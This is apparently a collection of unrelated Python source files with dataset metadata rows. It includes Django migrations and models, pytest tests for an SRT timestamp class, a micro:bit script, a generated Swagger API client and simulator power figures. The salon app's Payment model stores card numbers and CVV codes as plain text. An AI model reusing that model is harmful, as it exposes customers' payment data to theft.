| 39.653333 | 140 | 0.67384 | 923 | 5,948 | 4.271939 | 0.141928 | 0.064925 | 0.068476 | 0.028405 | 0.83439 | 0.815369 | 0.808014 | 0.799899 | 0.799899 | 0.799899 | 0 | 0.054969 | 0.140551 | 5,948 | 149 | 141 | 39.919463 | 0.716354 | 0.167787 | 0 | 0.7625 | 0 | 0 | 0.010569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.025 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2500143ad3a784e6fef2bd8686b236af68f2a668 | 3,724 | py | Python | Core/core/migrations/0002_aventura_lucha_mundoabierto_rol.py | Gelatito/4Fun-Games | c40bc2f0d9007a2fda0ed9ca5ea5f80adf7100cc | [
"MIT"
] | 1 | 2021-09-30T00:44:31.000Z | 2021-09-30T00:44:31.000Z | Core/core/migrations/0002_aventura_lucha_mundoabierto_rol.py | Gelatito/4Fun-Games | c40bc2f0d9007a2fda0ed9ca5ea5f80adf7100cc | [
"MIT"
] | null | null | null | Core/core/migrations/0002_aventura_lucha_mundoabierto_rol.py | Gelatito/4Fun-Games | c40bc2f0d9007a2fda0ed9ca5ea5f80adf7100cc | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-07-14 06:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Rol',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
migrations.CreateModel(
name='MundoAbierto',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
migrations.CreateModel(
name='Lucha',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
migrations.CreateModel(
name='Aventura',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
]
| 59.111111 | 122 | 0.630236 | 368 | 3,724 | 6.233696 | 0.163043 | 0.130776 | 0.094159 | 0.125545 | 0.904534 | 0.904534 | 0.904534 | 0.904534 | 0.904534 | 0.904534 | 0 | 0.020458 | 0.225564 | 3,724 | 62 | 123 | 60.064516 | 0.774965 | 0.012084 | 0 | 0.785714 | 1 | 0 | 0.187109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.089286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
25443727e674b9f820787e495946fa7d8cdda180 | 7,918 | py | Python | tests/srt/test_timestamp.py | sina-e/PyTitle | c23b9d686abb63581dbe2aef937a273d884229eb | [
"MIT"
] | 3 | 2022-03-23T17:14:37.000Z | 2022-03-25T00:02:06.000Z | tests/srt/test_timestamp.py | sina-e/pytitle | c23b9d686abb63581dbe2aef937a273d884229eb | [
"MIT"
] | null | null | null | tests/srt/test_timestamp.py | sina-e/pytitle | c23b9d686abb63581dbe2aef937a273d884229eb | [
"MIT"
] | null | null | null | import pytest
from pytitle.srt import Timestamp, exceptions
from pydantic import ValidationError
def test_timestamp_generation():
assert Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0).output == "00:00:00,000"
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456).output == "01:02:03,456"
assert Timestamp(
hours=1, minutes=25, seconds=39, milliseconds=456
).output == "01:25:39,456"
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=66, seconds=0, milliseconds=0)
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=0, seconds=70, milliseconds=0)
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=0, seconds=0, milliseconds=1000)
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=-10, seconds=0, milliseconds=0)
def test_timestamp_from_string():
timestamp = Timestamp.from_string("00:00:00,000")
assert timestamp.output == "00:00:00,000"
assert timestamp.hours == 0
assert timestamp.minutes == 0
assert timestamp.seconds == 0
assert timestamp.milliseconds == 0
def test_timestamp_from_string_additional():
timestamp = Timestamp.from_string("01:02:03,456")
assert timestamp.hours == 1
assert timestamp.minutes == 2
assert timestamp.seconds == 3
assert timestamp.milliseconds == 456
def test_timestamp_formatting():
assert Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
) == Timestamp.from_string("01:02:03,456")
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456).output
== "01:02:03,456"
)
def test_timestamp_bad_formatting():
assert Timestamp.from_string("1:02:03,456") == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert Timestamp.from_string("01:02:03,40") == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=40
)
assert Timestamp.from_string("1:2:3,456") == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
def test_timestamp_eq_ne_not_timestamp():
assert (Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) == 10) is False
assert (Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) != 10) is True
def test_timestamp_eq():
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678) == Timestamp(
hours=0, minutes=6, seconds=3, milliseconds=678
)
assert Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0) == Timestamp(
hours=0, minutes=0, seconds=0, milliseconds=0
)
assert Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456) == Timestamp(
hours=1, minutes=25, seconds=39, milliseconds=456
)
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
== Timestamp(hours=1, minutes=2, seconds=3, milliseconds=890)
) is False
assert (
Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456)
== Timestamp(hours=1, minutes=2, seconds=0, milliseconds=456)
) is False
assert (
Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456)
== Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
) is False
def test_timestamp_ne():
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) != Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=890
)
assert Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456) != Timestamp(
hours=1, minutes=2, seconds=0, milliseconds=456
)
assert Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456) != Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
!= Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
) is False
assert (
Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678)
!= Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678)
) is False
assert (
Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0)
!= Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0)
) is False
def test_timestamp_gt_ge():
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
> Timestamp(hours=1, minutes=2, seconds=3, milliseconds=890)
) is False
assert Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456) > Timestamp(
        hours=1, minutes=2, seconds=0, milliseconds=456
    )
    assert (
        Timestamp(hours=1, minutes=25, seconds=3, milliseconds=456)
        > Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456)
    ) is False
    assert Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456) > Timestamp(
        hours=1, minutes=2, seconds=3, milliseconds=456
    )
    assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) >= Timestamp(
        hours=1, minutes=2, seconds=3, milliseconds=456
    )
    assert (
        Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678)
        >= Timestamp(hours=1, minutes=6, seconds=3, milliseconds=678)
    ) is False


def test_timestamp_lt_le():
    assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) < Timestamp(
        hours=1, minutes=2, seconds=3, milliseconds=890
    )
    assert (
        Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456)
        < Timestamp(hours=1, minutes=2, seconds=0, milliseconds=456)
    ) is False
    assert Timestamp(hours=1, minutes=25, seconds=3, milliseconds=456) < Timestamp(
        hours=1, minutes=25, seconds=39, milliseconds=456
    )
    assert (
        Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456)
        < Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
    ) is False
    assert (
        Timestamp(hours=2, minutes=2, seconds=3, milliseconds=456)
        <= Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
    ) is False
    assert Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678) <= Timestamp(
        hours=0, minutes=6, seconds=3, milliseconds=678
    )


def test_timestamp_add():
    assert Timestamp(minutes=2, seconds=3, milliseconds=456) + Timestamp(
        hours=1
    ) == Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
    assert Timestamp(minutes=2, seconds=3, milliseconds=456) + Timestamp(
        hours=1,
        minutes=2,
    ) != Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)


def test_timestamp_sub():
    assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) - Timestamp(
        hours=1
    ) == Timestamp(hours=0, minutes=2, seconds=3, milliseconds=456)
    assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) - Timestamp(
        hours=1,
        minutes=2,
    ) != Timestamp(hours=0, minutes=2, seconds=3, milliseconds=456)
    assert Timestamp(minutes=2, seconds=3, milliseconds=456) - Timestamp(
        seconds=55, milliseconds=800
    ) == Timestamp(minutes=1, seconds=7, milliseconds=656)


def test_timestamp_negative_timestamp_error():
    with pytest.raises(exceptions.NegativeTimestampError):
        Timestamp(minutes=3, seconds=10) - Timestamp(minutes=5)


def test_timestamp_repr():
    assert repr(Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)) == (
        "Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)"
    )


def test_timestamp_get_value():
    timestamp = Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
    assert timestamp.get_value("hours") == "01"
    assert timestamp.get_value("minutes") == "02"
    assert timestamp.get_value("seconds") == "03"
    assert timestamp.get_value("milliseconds") == "456"
    with pytest.raises(ValueError):
        timestamp.get_value("foo")
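# The assertions above pin down the full behaviour of Timestamp: a total ordering
# by overall duration, carry-correct addition and subtraction, NegativeTimestampError
# on underflow, and zero-padded get_value() strings. A minimal sketch that satisfies
# them (hypothetical, not the project's actual implementation; NegativeTimestampError
# is defined locally here instead of imported from the project's exceptions module):

```python
from functools import total_ordering


class NegativeTimestampError(Exception):
    """Raised when a subtraction would produce a negative timestamp."""


@total_ordering
class Timestamp:
    def __init__(self, hours=0, minutes=0, seconds=0, milliseconds=0):
        self.hours = hours
        self.minutes = minutes
        self.seconds = seconds
        self.milliseconds = milliseconds

    def _total_ms(self):
        # Collapse the four fields into one comparable quantity.
        return ((self.hours * 60 + self.minutes) * 60 + self.seconds) * 1000 + self.milliseconds

    @classmethod
    def _from_ms(cls, ms):
        # Rebuild normalized fields from a millisecond count, refusing negatives.
        if ms < 0:
            raise NegativeTimestampError(ms)
        seconds, milliseconds = divmod(ms, 1000)
        minutes, seconds = divmod(seconds, 60)
        hours, minutes = divmod(minutes, 60)
        return cls(hours=hours, minutes=minutes, seconds=seconds, milliseconds=milliseconds)

    def __eq__(self, other):
        return self._total_ms() == other._total_ms()

    def __lt__(self, other):
        # total_ordering derives <=, >, >= from __eq__ and __lt__.
        return self._total_ms() < other._total_ms()

    def __add__(self, other):
        return Timestamp._from_ms(self._total_ms() + other._total_ms())

    def __sub__(self, other):
        return Timestamp._from_ms(self._total_ms() - other._total_ms())

    def __repr__(self):
        return (f"Timestamp(hours={self.hours}, minutes={self.minutes}, "
                f"seconds={self.seconds}, milliseconds={self.milliseconds})")

    def get_value(self, key):
        # hours/minutes/seconds are zero-padded to 2 digits, milliseconds to 3.
        if key in ("hours", "minutes", "seconds"):
            return f"{getattr(self, key):02d}"
        if key == "milliseconds":
            return f"{self.milliseconds:03d}"
        raise ValueError(key)
```

# With this sketch, the subtraction test above works out to
# Timestamp(minutes=1, seconds=7, milliseconds=656), and underflow raises.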
# --- bitbot code/backwards_forwards_v001.py (calderdigihub/PiWars21_crashBot, MIT) ---
from microbit import *
from time import sleep  # time.sleep takes seconds (shadows microbit's millisecond sleep)

# Toggle the BitBot's motor direction pins (pin8 and pin16) through a
# stop / one direction / other direction sequence, one second per step.
while True:
    pin8.write_digital(0)
    pin16.write_digital(0)
    sleep(1)
    pin8.write_digital(0)
    pin16.write_digital(1)
    sleep(1)
    pin8.write_digital(1)
    pin16.write_digital(0)
    sleep(1)
    pin8.write_digital(0)
    pin16.write_digital(0)
    # The same sequence is repeated a second time within each loop iteration.
    pin8.write_digital(0)
    pin16.write_digital(0)
    sleep(1)
    pin8.write_digital(0)
    pin16.write_digital(1)
    sleep(1)
    pin8.write_digital(1)
    pin16.write_digital(0)
    sleep(1)
    pin8.write_digital(0)
    pin16.write_digital(0)
# --- skyflow/errors/__init__.py (skyflowapi/skyflow-python, MIT) ---
from ._skyflowerrors import SkyflowErrorCodes
from ._skyflowerrors import SkyflowError
# --- selia_about/views/about_selia.py (CONABIO-audio/selia-about, BSD-4-Clause) ---
from django.shortcuts import render


def about_selia(request):
    return render(request, 'selia_about/selia.html')
# --- _website/models/__init__.py (marcoEDU/HackerspaceWebsiteTemplate, MIT) ---
from _website.models.request import Request
from _website.models.response import Response
# --- crowdemotion_api_client_python/apis/timeseries_api.py (CrowdEmotion/crowdemotion-api-client-python, Apache-2.0) ---
# coding: utf-8
"""
    CloudEmotion API v1

    CrowdEmotion API

    OpenAPI spec version: 1.1.0

    Generated by: https://github.com/swagger-api/swagger-codegen.git

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at

        http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    See the License for the specific language governing permissions and
    limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TimeseriesApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client
    def timeseries_delete(self, response_id, **kwargs):
        """
        Delete a Timeseries
        <p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.timeseries_delete(response_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int response_id: ID of the Response associated to the TimeSeries. (required)
        :param int metric_id: ID of the Metric of the Timeseries to be deleted.
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.timeseries_delete_with_http_info(response_id, **kwargs)
        else:
            (data) = self.timeseries_delete_with_http_info(response_id, **kwargs)
            return data
    def timeseries_delete_with_http_info(self, response_id, **kwargs):
        """
        Delete a Timeseries
        <p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.timeseries_delete_with_http_info(response_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int response_id: ID of the Response associated to the TimeSeries. (required)
        :param int metric_id: ID of the Metric of the Timeseries to be deleted.
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['response_id', 'metric_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method timeseries_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'response_id' is set
        if ('response_id' not in params) or (params['response_id'] is None):
            raise ValueError("Missing the required parameter `response_id` when calling `timeseries_delete`")

        resource_path = '/timeseries'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'response_id' in params:
            query_params['response_id'] = params['response_id']
        if 'metric_id' in params:
            query_params['metric_id'] = params['metric_id']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['api_key']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='str',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))
    def timeseries_get(self, response_id, **kwargs):
        """
        Get all recorded timeseries for a Response
        <p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.timeseries_get(response_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int response_id: ID of the Response associated to the TimeSeries. (required)
        :param int metric_id: ID of the Metric associated to the TimeSeries.
        :param bool normalize: Return data between 0 and 1. Default: false.
        :param str format: If value is 'csv' then data is passed back in CSV format instead of the default time-series format. Example: csv.
        :return: list[Timeseries]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.timeseries_get_with_http_info(response_id, **kwargs)
        else:
            (data) = self.timeseries_get_with_http_info(response_id, **kwargs)
            return data
    def timeseries_get_with_http_info(self, response_id, **kwargs):
        """
        Get all recorded timeseries for a Response
        <p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.timeseries_get_with_http_info(response_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int response_id: ID of the Response associated to the TimeSeries. (required)
        :param int metric_id: ID of the Metric associated to the TimeSeries.
        :param bool normalize: Return data between 0 and 1. Default: false.
        :param str format: If value is 'csv' then data is passed back in CSV format instead of the default time-series format. Example: csv.
        :return: list[Timeseries]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['response_id', 'metric_id', 'normalize', 'format']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method timeseries_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'response_id' is set
        if ('response_id' not in params) or (params['response_id'] is None):
            raise ValueError("Missing the required parameter `response_id` when calling `timeseries_get`")

        resource_path = '/timeseries'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'response_id' in params:
            query_params['response_id'] = params['response_id']
        if 'metric_id' in params:
            query_params['metric_id'] = params['metric_id']
        if 'normalize' in params:
            query_params['normalize'] = params['normalize']
        if 'format' in params:
            query_params['format'] = params['format']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['api_key']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='list[Timeseries]',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))
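# Every generated method above follows the same dispatch convention: return the
# result synchronously when no `callback` keyword is supplied, otherwise run the
# request on a worker thread and hand the result to the callback. A stripped-down,
# self-contained sketch of just that pattern (hypothetical `call_api` helper,
# independent of the generated client):

```python
import threading


def call_api(request_fn, callback=None):
    """Run request_fn synchronously, or on a thread that feeds its result to callback."""
    if callback is None:
        return request_fn()  # synchronous path: return the data directly

    def worker():
        callback(request_fn())  # asynchronous path: deliver the result to the callback

    thread = threading.Thread(target=worker)
    thread.start()
    return thread  # caller may join() the returned thread, as the docstrings describe
```

# Usage mirrors the docstrings: `call_api(fn)` blocks and returns data, while
# `call_api(fn, callback=...)` returns immediately with the request thread.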
# --- gpytorch/metrics/__init__.py (llguo95/gpytorch, MIT) ---
from .metrics import (
    mean_absolute_error,
    mean_squared_error,
    mean_standardized_log_loss,
    negative_log_predictive_density,
    quantile_coverage_error,
)

__all__ = [
    "mean_absolute_error",
    "mean_squared_error",
    "mean_standardized_log_loss",
    "negative_log_predictive_density",
    "quantile_coverage_error",
]
# --- salonapp/models.py (mollybeach/madeleineSalon, Apache-2.0) ---
from django.db import models
from django import forms
from datetime import datetime


# Create your models here.
class Users(models.Model):
    firstname = models.CharField(max_length=2000, null=True, blank=True, default=None)
    lastname = models.TextField(max_length=20000, null=True, blank=True, default=None)
    email = models.TextField(max_length=20000, null=True, blank=True, default=None)
    service = models.TextField(max_length=20000, null=True, blank=True, default=None)
    telephone = models.TextField(max_length=20000, null=True, blank=True, default=None)
    appointmentdate = models.TextField(max_length=20000, null=True, blank=True, default=None)
    time = models.DateTimeField(null=True, blank=True, default=None)

    def __str__(self):  # double-underscore name, so Django actually calls it
        # str(self.time) avoids a TypeError from concatenating a datetime
        return " ".join([self.firstname, self.lastname, self.email, self.service,
                         self.telephone, self.appointmentdate, str(self.time)])


class Payment(models.Model):
    nameoncard = models.CharField(max_length=2000, null=True, blank=True, default=None)
    email = models.TextField(max_length=20000, null=True, blank=True, default=None)
    service = models.TextField(max_length=20000, null=True, blank=True, default=None)
    telephone = models.TextField(max_length=20000, null=True, blank=True, default=None)
    appointmentdate = models.TextField(max_length=20000, null=True, blank=True, default=None)
    time = models.DateTimeField(null=True, blank=True, default=None)
    creditcardnumber = models.TextField(max_length=20000, null=True, blank=True, default=None)
    cvv = models.TextField(max_length=20000, null=True, blank=True, default=None)
    expiration = models.TextField(max_length=20000, null=True, blank=True, default=None)
    billingaddress = models.TextField(max_length=20000, null=True, blank=True, default=None)

    def __str__(self):
        return " ".join([self.nameoncard, self.email, self.service, self.telephone,
                         self.appointmentdate, str(self.time), self.creditcardnumber,
                         self.cvv, self.expiration, self.billingaddress])
# --- benchmarks/SimResults/Paper2_rr_spec_base/cmp_gobmksoplexpovraycalculix/power.py (TugberkArkose/MLScheduler, Unlicense) ---
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.195957,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.356602,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.05505,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.479848,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.830923,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.476558,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.78733,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.312556,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.38776,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
